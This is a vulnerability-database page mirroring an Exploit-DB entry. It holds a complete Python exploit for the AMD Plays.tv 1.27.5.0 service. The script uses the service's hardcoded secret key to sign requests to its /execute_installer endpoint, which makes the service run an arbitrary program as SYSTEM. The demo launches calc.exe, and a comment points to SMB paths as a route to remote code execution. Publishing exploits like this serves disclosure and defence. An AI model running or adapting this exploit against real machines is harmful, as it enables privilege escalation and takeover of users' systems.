Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution

🗓️ 15 Apr 2018 00:00:00Reported by SecuriferaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 25 Views

AMD Plays.tv 1.27.5.0 Arbitrary File Execution on Windows Syste

Code
########################################################################
#  http://support.amd.com/en-us/download?cmpid=CCCOffline - 
#  Click "Automatically Detect - Download Now"
#  Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
#  OR
#
#  https://plays.tv/download
#
#  Target OS:   Windows( Any )
#  Privilege:   SYSTEM
#  Type:        Arbitrary File Execution
#
#  Notes:       Second minor bug allows for arbitrary file write of 
#               uncontrolled data using the /extract_files path.
#
########################################################################

#!/usr/bin/python3
import urllib.request
import json
import hashlib

def check_svc( path, data ):
      
  #Setup request
  request = urllib.request.Request(addr)

  #add post data
  try:
    resp = urllib.request.urlopen(request, "data".encode("utf-8"))
    return "[-] Not Raptr, Plays TV service"
  except urllib.error.HTTPError as err:
    error_message = err.read().decode("utf-8")
    if error_message == 'Security failed - Missing hash or message[data]':
        return "[+] Raptr, Plays TV service"

def post_req( path, data ):
  
  secret_key = 'a%qs0t33QgiE6ut^0I&Y'
    
  #Setup request
  request = urllib.request.Request(addr)
  json_data = json.dumps(data)
  
  m = hashlib.md5()
  hash_data = path + json_data + secret_key
  m.update(hash_data.encode('utf8'))
  hash_str = m.hexdigest()
  
  #add post data
  p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
  resp = urllib.request.urlopen(request, p_data)
  return resp.read()

#Target IP address
ip = '127.0.0.1'

##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] 
##############################################################
port = 50452

##############################################################
# The service calls CreateProcess with the following format: 
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe"       #Local Execution
data = {
  "installer": cmd,
  "appdata": cmd
}

#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path

#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)

#Exploit service
ret = post_req(path, data)
print(ret)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Apr 2018 00:00Current
7.4High risk
Vulners AI Score7.4
amd playstvarbitrary file executionwindows systemremote code executionsmbephemeral portcreateprocess
25